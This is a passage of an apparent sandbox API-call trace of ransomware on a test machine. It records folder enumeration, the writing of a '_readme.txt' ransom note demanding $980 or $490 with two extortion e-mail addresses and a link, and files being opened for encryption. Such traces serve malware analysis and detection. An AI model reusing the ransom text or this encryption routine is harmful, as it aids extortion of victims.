lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c9950, ftCreationTime.dwHighDateTime=0x1d89ed3, ftLastAccessTime.dwLowDateTime=0x85e58bd0, ftLastAccessTime.dwHighDateTime=0x1d8a699, ftLastWriteTime.dwLowDateTime=0x85e58bd0, ftLastWriteTime.dwHighDateTime=0x1d8a699, nFileSizeHigh=0x0, nFileSizeLow=0x17924, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4g2bIkE6.wav", cAlternateFileName="")) returned 1 [0180.805] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaea55950, ftCreationTime.dwHighDateTime=0x1d8a415, ftLastAccessTime.dwLowDateTime=0x2e598de0, ftLastAccessTime.dwHighDateTime=0x1d8a6fc, ftLastWriteTime.dwLowDateTime=0x2e598de0, ftLastWriteTime.dwHighDateTime=0x1d8a6fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k8_cI3l6hV1-Y7", cAlternateFileName="K8_CI3~1")) returned 1 [0180.805] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x402974f0, ftCreationTime.dwHighDateTime=0x1d8a11a, ftLastAccessTime.dwLowDateTime=0x4903a3a0, ftLastAccessTime.dwHighDateTime=0x1d8a3ab, ftLastWriteTime.dwLowDateTime=0x4903a3a0, ftLastWriteTime.dwHighDateTime=0x1d8a3ab, nFileSizeHigh=0x0, nFileSizeLow=0x168a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uDCO8hlR7krD.m4a", cAlternateFileName="UDCO8H~1.M4A")) returned 1 [0180.805] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x402974f0, ftCreationTime.dwHighDateTime=0x1d8a11a, ftLastAccessTime.dwLowDateTime=0x4903a3a0, ftLastAccessTime.dwHighDateTime=0x1d8a3ab, ftLastWriteTime.dwLowDateTime=0x4903a3a0, ftLastWriteTime.dwHighDateTime=0x1d8a3ab, nFileSizeHigh=0x0, nFileSizeLow=0x168a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uDCO8hlR7krD.m4a", cAlternateFileName="UDCO8H~1.M4A")) returned 0 [0180.805] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.806] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.806] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\") returned="Eb_B9k_JDAVxhXh0\\" [0180.806] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0180.806] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.806] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.806] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.806] PathFindFileNameW (pszPath="") returned="" [0180.806] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\*" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c950, ftCreationTime.dwHighDateTime=0x1d89a70, ftLastAccessTime.dwLowDateTime=0xcd597b10, ftLastAccessTime.dwHighDateTime=0x1d8a5a5, ftLastWriteTime.dwLowDateTime=0xcd597b10, ftLastWriteTime.dwHighDateTime=0x1d8a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.809] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c950, ftCreationTime.dwHighDateTime=0x1d89a70, ftLastAccessTime.dwLowDateTime=0xcd597b10, ftLastAccessTime.dwHighDateTime=0x1d8a5a5, ftLastWriteTime.dwLowDateTime=0xcd597b10, ftLastWriteTime.dwHighDateTime=0x1d8a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.810] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8a4e90, ftCreationTime.dwHighDateTime=0x1d89f8e, ftLastAccessTime.dwLowDateTime=0xc66ddad0, ftLastAccessTime.dwHighDateTime=0x1d8a6d6, ftLastWriteTime.dwLowDateTime=0xc66ddad0, ftLastWriteTime.dwHighDateTime=0x1d8a6d6, nFileSizeHigh=0x0, nFileSizeLow=0x19d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6X4EOyI76e.wav", cAlternateFileName="6X4EOY~1.WAV")) returned 1 [0180.810] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b698a0, ftCreationTime.dwHighDateTime=0x1d89791, ftLastAccessTime.dwLowDateTime=0x1fd04780, ftLastAccessTime.dwHighDateTime=0x1d8a5a5, ftLastWriteTime.dwLowDateTime=0x1fd04780, ftLastWriteTime.dwHighDateTime=0x1d8a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x17cfa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mOm18edC.mp3", cAlternateFileName="")) returned 1 [0180.810] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbef3680, ftCreationTime.dwHighDateTime=0x1d8a637, ftLastAccessTime.dwLowDateTime=0x61898110, ftLastAccessTime.dwHighDateTime=0x1d8a6c1, ftLastWriteTime.dwLowDateTime=0x61898110, ftLastWriteTime.dwHighDateTime=0x1d8a6c1, nFileSizeHigh=0x0, nFileSizeLow=0x6c13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sTzvqONg_kzYduboTTT.mp3", cAlternateFileName="STZVQO~1.MP3")) returned 1 [0180.810] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbef3680, ftCreationTime.dwHighDateTime=0x1d8a637, ftLastAccessTime.dwLowDateTime=0x61898110, ftLastAccessTime.dwHighDateTime=0x1d8a6c1, ftLastWriteTime.dwLowDateTime=0x61898110, ftLastWriteTime.dwHighDateTime=0x1d8a6c1, nFileSizeHigh=0x0, nFileSizeLow=0x6c13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sTzvqONg_kzYduboTTT.mp3", cAlternateFileName="STZVQO~1.MP3")) returned 0 [0180.810] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.811] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.811] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\") returned="j ucK2lALp_iPp\\" [0180.811] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0180.811] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.811] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.811] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.811] PathFindFileNameW (pszPath="") returned="" [0180.811] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\*" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.814] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.814] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a2eabf0, ftCreationTime.dwHighDateTime=0x1d89f39, ftLastAccessTime.dwLowDateTime=0xb37640c0, ftLastAccessTime.dwHighDateTime=0x1d8a140, ftLastWriteTime.dwLowDateTime=0xb37640c0, ftLastWriteTime.dwHighDateTime=0x1d8a140, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="47m5sv0uqVNl", cAlternateFileName="47M5SV~1")) returned 1 [0180.814] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed82d140, ftCreationTime.dwHighDateTime=0x1d89e2d, ftLastAccessTime.dwLowDateTime=0xf2024cb0, ftLastAccessTime.dwHighDateTime=0x1d8a4c1, ftLastWriteTime.dwLowDateTime=0xf2024cb0, ftLastWriteTime.dwHighDateTime=0x1d8a4c1, nFileSizeHigh=0x0, nFileSizeLow=0xc124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dIbGo7.wav", cAlternateFileName="")) returned 1 [0180.814] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3f6df0, ftCreationTime.dwHighDateTime=0x1d8a665, ftLastAccessTime.dwLowDateTime=0x2eb69040, ftLastAccessTime.dwHighDateTime=0x1d8a723, ftLastWriteTime.dwLowDateTime=0x2eb69040, ftLastWriteTime.dwHighDateTime=0x1d8a723, nFileSizeHigh=0x0, nFileSizeLow=0x10dae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qIaOB8kqT6Gjfc.m4a", cAlternateFileName="QIAOB8~1.M4A")) returned 1 [0180.814] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa53e6f80, ftCreationTime.dwHighDateTime=0x1d89e59, ftLastAccessTime.dwLowDateTime=0xf2110640, ftLastAccessTime.dwHighDateTime=0x1d8a45f, ftLastWriteTime.dwLowDateTime=0xf2110640, ftLastWriteTime.dwHighDateTime=0x1d8a45f, nFileSizeHigh=0x0, nFileSizeLow=0x67b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VUGuU0EaHk4ce5o.wav", cAlternateFileName="VUGUU0~1.WAV")) returned 1 [0180.815] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.815] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.816] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\") returned="cvfGVyFL7tFjUO7\\" [0180.816] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0180.816] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.816] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.816] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.816] PathFindFileNameW (pszPath="") returned="" [0180.816] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe138b9c0, ftCreationTime.dwHighDateTime=0x1d89a97, ftLastAccessTime.dwLowDateTime=0xd50a4720, ftLastAccessTime.dwHighDateTime=0x1d89e81, ftLastWriteTime.dwLowDateTime=0xd50a4720, ftLastWriteTime.dwHighDateTime=0x1d89e81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.828] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.829] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.829] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\") returned="FPzctgqI5yS\\" [0180.829] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0180.829] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.830] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.830] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.830] PathFindFileNameW (pszPath="") returned="" [0180.830] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917ad4b0, ftCreationTime.dwHighDateTime=0x1d89d6a, ftLastAccessTime.dwLowDateTime=0x1967e630, ftLastAccessTime.dwHighDateTime=0x1d8a453, ftLastWriteTime.dwLowDateTime=0x1967e630, ftLastWriteTime.dwHighDateTime=0x1d8a453, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.833] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.834] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.834] PathFindFileNameW (pszPath="Z:\\") returned="Z:\\" [0180.834] PathFindFileNameW (pszPath="") returned="" [0180.834] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.834] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.835] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.835] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x2ade6e0 [0180.836] PathAppendW (in: pszPath="Z:\\", pMore="_readme.txt" | out: pszPath="Z:\\_readme.txt") returned 1 [0180.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.836] PathFileExistsW (pszPath="Z:\\_readme.txt") returned 0 [0180.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0180.838] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.838] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0180.844] CreateFileW (lpFileName="Z:\\_readme.txt" (normalized: "z:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0180.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.854] FindFirstFileW (in: lpFileName="Z:\\*" (normalized: "z:\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2ee910fd, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.933] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa583c4d7, ftCreationTime.dwHighDateTime=0x1d828c6, ftLastAccessTime.dwLowDateTime=0x3b3e3839, ftLastAccessTime.dwHighDateTime=0x1d8a632, ftLastWriteTime.dwLowDateTime=0xa583c4d7, ftLastWriteTime.dwHighDateTime=0x1d828c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.933] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd900, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4fcfIBg3Ryeoeu27DM.docx", cAlternateFileName="")) returned 1 [0180.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.933] PathFindExtensionW (pszPath="Z:\\4fcfIBg3Ryeoeu27DM.docx") returned=".docx" [0180.939] CreateFileW (lpFileName="Z:\\4fcfIBg3Ryeoeu27DM.docx" (normalized: "z:\\4fcfibg3ryeoeu27dm.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0180.941] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LgQIok5RNh.mp4", cAlternateFileName="")) returned 1 [0180.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.941] PathFindExtensionW (pszPath="Z:\\LgQIok5RNh.mp4") returned=".mp4" [0180.946] CreateFileW (lpFileName="Z:\\LgQIok5RNh.mp4" (normalized: "z:\\lgqiok5rnh.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0180.948] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12cd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lDq8f54d4hhCIri7rU.rtf", cAlternateFileName="")) returned 1 [0180.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.948] PathFindExtensionW (pszPath="Z:\\lDq8f54d4hhCIri7rU.rtf") returned=".rtf" 